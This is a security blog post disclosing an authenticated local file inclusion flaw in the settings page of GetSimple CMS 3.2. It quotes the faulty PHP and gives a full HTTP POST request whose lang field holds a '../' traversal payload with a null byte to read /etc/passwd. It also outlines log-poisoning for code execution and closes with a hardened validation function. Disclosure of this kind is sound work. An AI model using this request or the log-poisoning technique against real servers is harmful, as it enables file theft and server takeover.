GetSimple CMS 3.2 LFI exploit

Following on from my series of GetSimple CMS articles, this one details an LFI (Local File Inclusion) vulnerability which is present in the current release and in the current beta version, 3.2beta.

As per the previous article this requires you to be logged in as a valid user.

The code at fault is in the settings.php page, in the handling of the language parameter. I have listed the relevant section below:

if(isset($_POST['lang'])) {
$LANG = $_POST['lang'];

Then it's used here, unvalidated, as part of the include path:

include(GSLANGPATH.$LANG.'.php');

So, for example, if you post the following request you will get the /etc/passwd file back. Given that these days /etc/passwd contains no password hashes, that is probably the least of your worries; more likely an attacker would be after other files that contain credentials.

POST /admin/settings.php HTTP/1.1
Host: getsimplecmshost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://getsimplecmshost/admin/settings.php
Cookie: validcookie
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

nonce=validnonce&sitename=GetSimpleCMSSite&siteurl=http%3A%2F%2Fgetsimplehost%2F&permalink=&user=admin&email=admin@domainname&timezone=Europe%2FLondon&lang=../../../../../../../../etc/passwd%00&show_htmleditor=1&sitepwd=&sitepwd_confirm=&submitted=Save+Settings

As I've mentioned in previous articles, whilst this requires a valid user, it's not acceptable that even an authenticated user can read files off the local file system, especially in the case of hosted systems where the CMS user and the server administrator are not the same person.

In extreme circumstances this LFI can also lead to complete server compromise, using the well-known technique where PHP code is first injected into a file which is readable by the web server process (a log file, for instance) and that file is then included via the above request, so the injected code is executed.

Again, simple validation of the user-supplied language value against the set of language files that actually exist would completely prevent this attack.
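To show what that validation looks like, here is an added example of a hardened way to resolve the lang parameter before it reaches include(). This is not GetSimple's own code: GSLANGPATH is the constant used on the page, while resolve_lang_file() and the error message are hypothetical.

```php
<?php
// Added example, not GetSimple's code. GSLANGPATH is the constant from the
// page; resolve_lang_file() is a hypothetical helper written for this post.

function resolve_lang_file(string $langDir, string $requested): ?string
{
    // 1. Syntactic allowlist: language codes look like "en_US". Anything with
    //    slashes, dots or NUL bytes (the "../../etc/passwd%00" payload) fails here.
    if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $requested)) {
        return null;
    }

    // 2. Semantic allowlist: only files that really exist in the language
    //    directory are candidates, so the value is chosen from a fixed set.
    $candidate = $langDir . $requested . '.php';
    if (!is_file($candidate)) {
        return null;
    }

    // 3. Belt and braces: confirm the resolved path is still inside $langDir,
    //    so a symlink or odd directory layout cannot redirect the include.
    $real = realpath($candidate);
    $base = realpath($langDir);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Usage in settings.php: refuse the request instead of including whatever
// the client supplied. The error text is a constructed placeholder.
if (isset($_POST['lang'])) {
    $langFile = resolve_lang_file(GSLANGPATH, $_POST['lang']);
    if ($langFile === null) {
        die('Invalid language selection');
    }
    $LANG = basename($langFile, '.php'); // keeps the rest of the page working
    include($langFile);
}
```

With this in place the payload from the request above is rejected at step 1, before any filesystem call is made, and a legitimate value such as en_US is still accepted.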
